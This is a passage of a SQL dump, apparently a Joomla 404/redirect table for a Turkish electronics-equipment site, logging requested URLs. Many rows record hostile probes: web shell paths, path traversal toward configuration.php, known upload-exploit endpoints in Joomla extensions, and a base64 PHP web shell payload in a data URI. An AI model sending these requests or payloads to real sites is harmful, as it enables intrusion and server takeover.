00:00:00',301),(17967,'http://3s-technologies.com.tr/tmp/plain;base64,pd9wahagqgfzc2vydchaymfzzty0x2rly29kzshac3ryx3jvddezkcrfue9tvfsizgf0ysjdkskpo2rpzts7pz4=;.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-23 14:27:20','0000-00-00 00:00:00',301),(17968,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/tolo',NULL,'','',5,0,'2018-01-23 20:39:31','0000-00-00 00:00:00',301),(17969,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hä±z/mx200lp-3-detail',NULL,'','',5,0,'2018-01-24 02:29:18','0000-00-00 00:00:00',301),(17970,'http://3s-technologies.com.tr/en/images/ddm/reflow ovens/spartan_8s.gif',NULL,'http://3s-technologies.com.tr/en/products-en/dalga-lehim/spartan-8s-8d-44-detail','',1,0,'2018-01-24 17:02:23','0000-00-00 00:00:00',301),(17971,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_foxcontact/_func.php',NULL,'','',1,0,'2018-01-24 23:58:58','0000-00-00 00:00:00',301),(17972,'http://3s-technologies.com.tr/tr/phpinfo.php',NULL,'','',62,0,'2018-01-25 03:47:23','0000-00-00 00:00:00',301),(17973,'http://3s-technologies.com.tr/tr/joomla/images/pdf/gf_conveyer_and_batch_reflow_ovens.pdf',NULL,'','',17,0,'2018-01-25 08:20:53','0000-00-00 00:00:00',301),(17974,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/manufacturer/resized/mirae_logo_250x250.gif',NULL,'','',1,0,'2018-01-25 11:10:33','0000-00-00 00:00:00',301),(17975,'http://www.3s-technologies.com.tr/tr/components/com_foxcontact/_func.php',NULL,'','',80,0,'2018-01-25 22:18:26','0000-00-00 00:00:00',301),(17976,'http://www.3s-technologies.com.tr/tr/joomla/components/com_foxcontact/_func.php',NULL,'','',1,0,'2018-01-25 22:18:26','0000-00-00 00:00:00',301),(17977,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/screen-printer/dirdesc/results,1-20',NULL,'','',1,0,'2018-01-26 10:15:14','0000-00-00 00:00:00',301),(17978,'http://3s-technologies.com.tr/tr/upload/_dispatch.php',NULL,'http://3s-technologies.com.tr/upload/_dispatch.php','',1,0,'2018-01-27 00:50:10','0000-00-00 00:00:00',301),(17979,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/results,1-10',NULL,'','',13,0,'2018-01-27 10:31:19','0000-00-00 00:00:00',301),(17980,'http://www.3s-technologies.com.tr/tr/assets/global/plugins/jquery-file-upload/server/node/server.js',NULL,'','',2,0,'2018-01-27 14:52:05','0000-00-00 00:00:00',301),(17981,'http://www.3s-technologies.com.tr/tr/klfhsyys',NULL,'http://www.3s-technologies.com.tr/KlfhsYYs','',1,0,'2018-01-28 02:07:34','0000-00-00 00:00:00',301),(17982,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/dirdesc/results,1-20?language=en-gb',NULL,'','',4,0,'2018-01-28 03:23:46','0000-00-00 00:00:00',301),(17983,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/dirdesc/results,1-50?language=en-gb',NULL,'','',4,0,'2018-01-28 05:25:20','0000-00-00 00:00:00',301),(17984,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name/results,1-5?language=en-gb',NULL,'','',4,0,'2018-01-28 06:10:50','0000-00-00 00:00:00',301),(17985,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name/results,1-20?language=en-gb',NULL,'','',1,0,'2018-01-28 06:50:56','0000-00-00 00:00:00',301),(17986,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,ordering/results,1-5?language=en-gb',NULL,'','',1,0,'2018-01-28 07:26:36','0000-00-00 00:00:00',301),(17987,'http://3s-technologies.com.tr/en/customer/account/create',NULL,'','',1,0,'2018-01-28 17:39:55','0000-00-00 00:00:00',301),(17988,'https://3s-technologies.com.tr:443/tr/modules/mod_jtagmembersdirectory_category/mod_jtagmembersdirectory_category.xml',NULL,'','',2,0,'2018-01-29 01:47:27','0000-00-00 00:00:00',301),(17989,'http://www.3s-technologies.com.tr/en/server/php',NULL,'http://www.3s-technologies.com.tr/server/php/','',9,0,'2018-01-29 02:01:48','0000-00-00 00:00:00',301),(17990,'http://3s-technologies.com.tr/tr/modules/mod_photocomments/tmpl/logo_img.php.suspected',NULL,'http://site.ru','',1,0,'2018-01-29 10:08:14','0000-00-00 00:00:00',301),(17991,'http://3s-technologies.com.tr/tr/components/com_foxcontact/config.php',NULL,'http://site.ru','',4,0,'2018-01-29 10:51:49','0000-00-00 00:00:00',301),(17992,'http://3s-technologies.com.tr/tr/components/com_foxcontact/b0x.php',NULL,'http://site.ru','',4,0,'2018-01-29 11:45:11','0000-00-00 00:00:00',301),(17993,'http://3s-technologies.com.tr/tr/templates/0.php',NULL,'http://site.ru','',1,0,'2018-01-29 11:55:20','0000-00-00 00:00:00',301),(17994,'http://3s-technologies.com.tr/tr/images/stories/me.php',NULL,'http://site.ru','',2,0,'2018-01-29 12:38:41','0000-00-00 00:00:00',301),(17995,'http://3s-technologies.com.tr/tr/language/en-gb/error.php',NULL,'http://site.ru','',2,0,'2018-01-29 13:05:27','0000-00-00 00:00:00',301),(17996,'http://3s-technologies.com.tr/tr/bacot.php',NULL,'http://site.ru','',5,0,'2018-01-29 13:32:16','0000-00-00 00:00:00',301),(17997,'http://3s-technologies.com.tr/tr/stats/wp-caches.php',NULL,'http://site.ru','',5,0,'2018-01-29 15:21:07','0000-00-00 00:00:00',301),(17998,'http://3s-technologies.com.tr/tr/0.php',NULL,'http://site.ru','',141,0,'2018-01-29 15:50:37','0000-00-00 00:00:00',301),(17999,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.4/marvins.php',NULL,'http://site.ru','',6,0,'2018-01-29 16:15:14','0000-00-00 00:00:00',301),(18000,'http://3s-technologies.com.tr/tr/shell.php',NULL,'http://site.ru','',357,0,'2018-01-29 16:22:22','0000-00-00 00:00:00',301),(18001,'http://3s-technologies.com.tr/tr/prom.php',NULL,'http://site.ru','',2,0,'2018-01-29 17:09:09','0000-00-00 00:00:00',301),(18002,'http://3s-technologies.com.tr/tr/libraries/pgsq.php',NULL,'http://site.ru','',2,0,'2018-01-29 18:01:39','0000-00-00 00:00:00',301),(18003,'http://3s-technologies.com.tr/tr/components/marvins.php',NULL,'http://site.ru','',5,0,'2018-01-29 18:28:41','0000-00-00 00:00:00',301),(18004,'http://3s-technologies.com.tr/tr/components/sec.php',NULL,'http://site.ru','',4,0,'2018-01-29 22:56:37','0000-00-00 00:00:00',301),(18005,'http://3s-technologies.com.tr/tr/components/sec.php',NULL,'http://site.ru','',1,0,'2018-01-29 22:56:37','0000-00-00 00:00:00',301),(18006,'http://3s-technologies.com.tr/tr/components/s.php',NULL,'http://site.ru','',2,0,'2018-01-29 23:32:58','0000-00-00 00:00:00',301),(18007,'http://3s-technologies.com.tr/components/com_sexycontactform/fileupload/index.php',NULL,'','',17,0,'2018-01-30 03:26:04','0000-00-00 00:00:00',301),(18008,'http://3s-technologies.com.tr/tr/components/com_b2jcontact/x0x04.php',NULL,'http://site.ru','',5,0,'2018-01-30 07:49:14','0000-00-00 00:00:00',301),(18009,'http://3s-technologies.com.tr/tr/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../../loaderstens.php',NULL,'http://3s-technologies.com.tr/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../../loaderstens.php','',1,0,'2018-01-30 11:45:28','0000-00-00 00:00:00',301),(18010,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/category/resized/t_mi300_250x250.jpg',NULL,'','',1,0,'2018-01-30 13:11:10','0000-00-00 00:00:00',301),(18011,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/404',NULL,'','',3,0,'2018-01-30 13:51:03','0000-00-00 00:00:00',301),(18012,'http://www.3s-technologies.com.tr/tr/.ftpconfig',NULL,'','',2,0,'2018-01-30 16:07:35','0000-00-00 00:00:00',301),(18013,'http://www.3s-technologies.com.tr/en/assets/global/plugins/jquery-file-upload/server/php',NULL,'http://www.3s-technologies.com.tr/assets/global/plugins/jquery-file-upload/server/php/','',1,0,'2018-01-31 01:19:19','0000-00-00 00:00:00',301),(18014,'http://3s-technologies.com.tr/tr//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2018-01-31 04:25:09','0000-00-00 00:00:00',301),(18015,'http://3s-technologies.com.tr/tr/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',22,0,'2018-01-31 07:13:23','0000-00-00 00:00:00',301),(18016,'http://www.3s-technologies.com.tr/tr/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',34,0,'2018-01-31 08:39:13','0000-00-00 00:00:00',301),(18017,'http://www.3s-technologies.com.tr/tr/images/stories/mil.gif',NULL,'','',2,0,'2018-01-31 08:39:15','0000-00-00 00:00:00',301),(18018,'http://www.3s-technologies.com.tr/tr/images/stories/pbot.php',NULL,'','',2,0,'2018-01-31 08:39:16','0000-00-00 00:00:00',301),(18019,'http://www.3s-technologies.com.tr/tr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php',NULL,'','',1,0,'2018-01-31 08:39:17','0000-00-00 00:00:00',301),(18020,'http://www.3s-technologies.com.tr/tr/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php',NULL,'','',2,0,'2018-01-31 08:39:19','0000-00-00 00:00:00',301),(18021,'http://www.3s-technologies.com.tr/tr/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2018-01-31 08:39:21','0000-00-00 00:00:00',301),(18022,'http://www.3s-technologies.com.tr/tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2018-01-31 08:39:23','0000-00-00 00:00:00',301),(18023,'http://www.3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2018-01-31 08:39:25','0000-00-00 00:00:00',301),(18024,'http://www.3s-technologies.com.tr/tr/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2018-01-31 08:39:27','0000-00-00 00:00:00',301),(18025,'http://www.3s-technologies.com.tr/tr/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2018-01-31 08:39:29','0000-00-00 00:00:00',301),(18026,'http://www.3s-technologies.com.tr/tr/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2018-01-31 08:39:31','0000-00-00 00:00:00',301),(18027,'http://www.3s-technologies.com.tr/tr/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php',NULL,'','',2,0,'2018-01-31 08:39:33','0000-00-00 00:00:00',301),(18028,'http://www.3s-technologies.com.tr/tr/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',2,0,'2018-01-31 08:39:35','0000-00-00 00:00:00',301),(18029,'http://www.3s-technologies.com.tr/tr/?option=com_jdownloads&itemid=0&view=upload',NULL,'','',3,0,'2018-01-31 08:39:37','0000-00-00 00:00:00',301),(18030,'http://www.3s-technologies.com.tr/tr/cfg-contactform-1/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:39','0000-00-00 00:00:00',301),(18031,'http://www.3s-technologies.com.tr/tr/cfg-contactform-2/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:39','0000-00-00 00:00:00',301),(18032,'http://www.3s-technologies.com.tr/tr/cfg-contactform-3/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:40','0000-00-00 00:00:00',301),(18033,'http://www.3s-technologies.com.tr/tr/cfg-contactform-4/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:40','0000-00-00 00:00:00',301),(18034,'http://www.3s-technologies.com.tr/tr/cfg-contactform-5/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:40','0000-00-00 00:00:00',301),(18035,'http://www.3s-technologies.com.tr/tr/cfg-contactform-6/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:41','0000-00-00 00:00:00',301),(18036,'http://www.3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload/index.php',NULL,'','',2,0,'2018-01-31 08:39:41','0000-00-00 00:00:00',301),(18037,'http://www.3s-technologies.com.tr/tr/cfg-contactform-7/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:41','0000-00-00 00:00:00',301),(18038,'http://www.3s-technologies.com.tr/tr/cfg-contactform-8/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:42','0000-00-00 00:00:00',301),(18039,'http://www.3s-technologies.com.tr/tr/cfg-contactform-9/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:42','0000-00-00 00:00:00',301),(18040,'http://www.3s-technologies.com.tr/tr/cfg-contactform-10/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:42','0000-00-00 00:00:00',301),(18041,'http://www.3s-technologies.com.tr/tr/cfg-contactform-11/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:43','0000-00-00 00:00:00',301),(18042,'http://www.3s-technologies.com.tr/tr/cfg-contactform-12/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:43','0000-00-00 00:00:00',301),(18043,'http://www.3s-technologies.com.tr/tr/components/com_creativecontactform/fileupload/index.php',NULL,'','',2,0,'2018-01-31 08:39:43','0000-00-00 00:00:00',301),(18044,'http://www.3s-technologies.com.tr/tr/cfg-contactform-13/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:44','0000-00-00 00:00:00',301),(18045,'http://www.3s-technologies.com.tr/tr/cfg-contactform-14/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:44','0000-00-00 00:00:00',301),(18046,'http://www.3s-technologies.com.tr/tr/cfg-contactform-15/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:44','0000-00-00 00:00:00',301),(18047,'http://www.3s-technologies.com.tr/tr/cfg-contactform-16/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:45','0000-00-00 00:00:00',301),(18048,'http://www.3s-technologies.com.tr/tr/cfg-contactform-17/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:45','0000-00-00 00:00:00',301),(18049,'http://www.3s-technologies.com.tr/tr/?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',9,0,'2018-01-31 08:39:45','0000-00-00 00:00:00',301),(18050,'http://www.3s-technologies.com.tr/tr/cfg-contactform-18/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:45','0000-00-00 00:00:00',301),(18051,'http://www.3s-technologies.com.tr/tr/cfg-contactform-19/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:46','0000-00-00 00:00:00',301),(18052,'http://www.3s-technologies.com.tr/tr/cfg-contactform-20/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:39:46','0000-00-00 00:00:00',301),(18053,'http://www.3s-technologies.com.tr/tr/?option=com_myblog&task=ajaxupload',NULL,'','',8,0,'2018-01-31 08:39:49','0000-00-00 00:00:00',301),(18054,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',1,0,'2018-01-31 08:39:52','0000-00-00 00:00:00',301),(18055,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php',NULL,'','',1,0,'2018-01-31 08:39:56','0000-00-00 00:00:00',301),(18056,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php',NULL,'','',1,0,'2018-01-31 08:39:58','0000-00-00 00:00:00',301),(18057,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-01-31 08:40:00','0000-00-00 00:00:00',301),(18058,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-01-31 08:40:02','0000-00-00 00:00:00',301),(18059,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-01-31 08:40:05','0000-00-00 00:00:00',301),(18060,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-01-31 08:40:06','0000-00-00 00:00:00',301),(18061,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-01-31 08:40:08','0000-00-00 00:00:00',301),(18062,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-01-31 08:40:10','0000-00-00 00:00:00',301),(18063,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php',NULL,'','',1,0,'2018-01-31 08:40:12','0000-00-00 00:00:00',301),(18064,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2018-01-31 08:40:14','0000-00-00 00:00:00',301),(18065,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2018-01-31 08:40:16','0000-00-00 00:00:00',301),(18066,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-1/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:18','0000-00-00 00:00:00',301),(18067,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-2/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:18','0000-00-00 00:00:00',301),(18068,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-3/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:18','0000-00-00 00:00:00',301),(18069,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-4/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:19','0000-00-00 00:00:00',301),(18070,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-5/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:19','0000-00-00 00:00:00',301),(18071,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-6/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:19','0000-00-00 00:00:00',301),(18072,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-7/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:19','0000-00-00 00:00:00',301),(18073,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-8/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:20','0000-00-00 00:00:00',301),(18074,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-9/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:20','0000-00-00 00:00:00',301),(18075,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-10/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:20','0000-00-00 00:00:00',301),(18076,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2018-01-31 08:40:20','0000-00-00 00:00:00',301),(18077,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-11/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:20','0000-00-00 00:00:00',301),(18078,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-12/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:20','0000-00-00 00:00:00',301),(18079,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-13/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:21','0000-00-00 00:00:00',301),(18080,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-14/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:21','0000-00-00 00:00:00',301),(18081,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-15/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:21','0000-00-00 00:00:00',301),(18082,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-16/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:21','0000-00-00 00:00:00',301),(18083,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-17/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:21','0000-00-00 00:00:00',301),(18084,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-18/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:22','0000-00-00 00:00:00',301),(18085,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-19/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:22','0000-00-00 00:00:00',301),(18086,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2018-01-31 08:40:22','0000-00-00 00:00:00',301),(18087,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//cfg-contactform-20/inc/upload.php',NULL,'','',1,0,'2018-01-31 08:40:22','0000-00-00 00:00:00',301),(18088,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2018-01-31 08:40:24','0000-00-00 00:00:00',301),(18089,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components//components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jquploader=1',NULL,'','',1,0,'2018-01-31 08:40:26','0000-00-00 00:00:00',301),(18090,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/index.php?option=com_myblog&task=ajaxupload',NULL,'','',1,0,'2018-01-31 08:40:28','0000-00-00 00:00:00',301),(18091,'http://3s-technologies.com.tr/tr//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2018-01-31 11:56:55','0000-00-00 00:00:00',301),(18092,'http://3s-technologies.com.tr/tr/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',22,0,'2018-01-31 14:47:50','0000-00-00 00:00:00',301),(18093,'http://3s-technologies.com.tr/tr/administrator/cache/theme.php',NULL,'http://site.ru','',3,0,'2018-01-31 15:13:27','0000-00-00 00:00:00',301),(18094,'http://3s-technologies.com.tr/tr/beta/wp-admin/setup-config.php',NULL,'','',2,0,'2018-01-31 22:47:36','0000-00-00 00:00:00',301),(18095,'http://3s-technologies.com.tr/tr/blogs/wp-admin/setup-config.php',NULL,'','',3,0,'2018-01-31 22:47:36','0000-00-00 00:00:00',301),(18096,'http://3s-technologies.com.tr/tr/blog/wordpress/wp-admin/setup-config.php',NULL,'','',1,0,'2018-01-31 22:47:38','0000-00-00 00:00:00',301),(18097,'http://3s-technologies.com.tr/tr/wp-admin/setup-config.php',NULL,'','',189,0,'2018-01-31 22:47:38','0000-00-00 00:00:00',301),(18098,'http://3s-technologies.com.tr/tr/site/wp-admin/setup-config.php',NULL,'','',4,0,'2018-01-31 22:47:39','0000-00-00 00:00:00',301),(18099,'http://3s-technologies.com.tr/tr/cms/wp-admin/setup-config.php',NULL,'','',2,0,'2018-01-31 22:47:39','0000-00-00 00:00:00',301),(18100,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.4/kv.php',NULL,'http://site.ru','',1,0,'2018-02-01 09:38:34','0000-00-00 00:00:00',301),(18101,'http://3s-technologies.com.tr/tr/administrator/components/com_languages/models/forms/plmrmb.php',NULL,'http://site.ru','',2,0,'2018-02-01 09:39:58','0000-00-00 00:00:00',301),(18102,'http://3s-technologies.com.tr/tr/libraries/simplepie/idn/kuxel.php',NULL,'http://site.ru','',1,0,'2018-02-01 09:40:07','0000-00-00 00:00:00',301),(18103,'http://3s-technologies.com.tr/tr/layouts/joomla/links/jnxsn.php',NULL,'http://site.ru','',4,0,'2018-02-01 09:42:55','0000-00-00 00:00:00',301),(18104,'http://3s-technologies.com.tr/tr/administrator/components/com_sigpro/views/okkas.php',NULL,'http://site.ru','',1,0,'2018-02-01 09:45:15','0000-00-00 00:00:00',301),(18105,'http://3s-technologies.com.tr/tr/modules/mod_workfromhome/mod_workfromhome.php',NULL,'http://site.ru','',4,0,'2018-02-01 09:48:36','0000-00-00 00:00:00',301),(18106,'http://3s-technologies.com.tr/tr/administrator/components/com_templates/views/styles/tmpl/okkas.php',NULL,'http://site.ru','',1,0,'2018-02-01 09:49:29','0000-00-00 00:00:00',301),(18107,'http://3s-technologies.com.tr/tr/media/shell.php',NULL,'http://site.ru','',4,0,'2018-02-01 09:50:11','0000-00-00 00:00:00',301),(18108,'http://3s-technologies.com.tr/tr/administrator/components/com_admintools/views/fixpermsconfig/tmpl/plmrmb.php',NULL,'http://site.ru','',1,0,'2018-02-01 10:36:18','0000-00-00 00:00:00',301),(18109,'http://3s-technologies.com.tr/tr/media/editors/codemirror/mode/nsis/pouimeq.php',NULL,'http://site.ru','',1,0,'2018-02-01 10:36:46','0000-00-00 00:00:00',301),(18110,'http://3s-technologies.com.tr/tr/administrator/components/com_virtuemart/assets/images/admin_menu/desua.php',NULL,'http://site.ru','',3,0,'2018-02-01 10:36:46','0000-00-00 00:00:00',301),(18111,'http://3s-technologies.com.tr/tr/cli/dawhk.php',NULL,'http://site.ru','',2,0,'2018-02-01 10:37:21','0000-00-00 00:00:00',301),(18112,'http://3s-technologies.com.tr/tr/wp-includes/admin_login.php',NULL,'http://site.ru','',2,0,'2018-02-01 10:37:34','0000-00-00 00:00:00',301),(18113,'http://3s-technologies.com.tr/tr/1/administrator/components/com_newsfeeds/views/newsfeeds/sql-ou.php',NULL,'http://site.ru','',2,0,'2018-02-01 10:38:17','0000-00-00 00:00:00',301),(18114,'http://3s-technologies.com.tr/tr/templates/yoo_square/images/widgetkit/white/pafycx.php',NULL,'http://site.ru','',1,0,'2018-02-01 10:42:46','0000-00-00 00:00:00',301),(18115,'http://3s-technologies.com.tr/tr/joomla/administrator/templates/khepri/images/menu/sql-ou.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:38:47','0000-00-00 00:00:00',301),(18116,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/com_installer/update/pouimeq.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:38:49','0000-00-00 00:00:00',301),(18117,'http://3s-technologies.com.tr/tr/modules/mod_roknavmenu/themes/fusion/js/sky.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:39:07','0000-00-00 00:00:00',301),(18118,'http://3s-technologies.com.tr/tr/components/com_content/views/categories/tmpl/ini.php',NULL,'http://site.ru','',2,0,'2018-02-01 11:39:39','0000-00-00 00:00:00',301),(18119,'http://3s-technologies.com.tr/tr/modules/mod_poll/tmpl/my.php',NULL,'http://site.ru','',3,0,'2018-02-01 11:39:40','0000-00-00 00:00:00',301),(18120,'http://3s-technologies.com.tr/tr/star/plugins/vmpayment/standard/language/en-gb/kimwv.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:39:42','0000-00-00 00:00:00',301),(18121,'http://3s-technologies.com.tr/tr/language/shell.php',NULL,'http://site.ru','',2,0,'2018-02-01 11:39:54','0000-00-00 00:00:00',301),(18122,'http://3s-technologies.com.tr/tr/plugins/editors-xtd/xhmskkz.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:39:56','0000-00-00 00:00:00',301),(18123,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/fullscreen/langs/desua.php',NULL,'http://site.ru','',2,0,'2018-02-01 11:40:01','0000-00-00 00:00:00',301),(18124,'http://3s-technologies.com.tr/tr/templates/atomic/b0xed.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:40:19','0000-00-00 00:00:00',301),(18125,'http://3s-technologies.com.tr/tr/administrator/components/com_finder/views/maps/tmpl/404.php',NULL,'http://site.ru','',2,0,'2018-02-01 11:40:21','0000-00-00 00:00:00',301),(18126,'http://3s-technologies.com.tr/tr/modules/mod_myblog_archive/mod_myblog_archive1.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:41:01','0000-00-00 00:00:00',301),(18127,'http://3s-technologies.com.tr/tr/framework.php',NULL,'http://site.ru','',5,0,'2018-02-01 11:41:29','0000-00-00 00:00:00',301),(18128,'http://3s-technologies.com.tr/tr/w.php',NULL,'http://site.ru','',301,0,'2018-02-01 11:49:23','0000-00-00 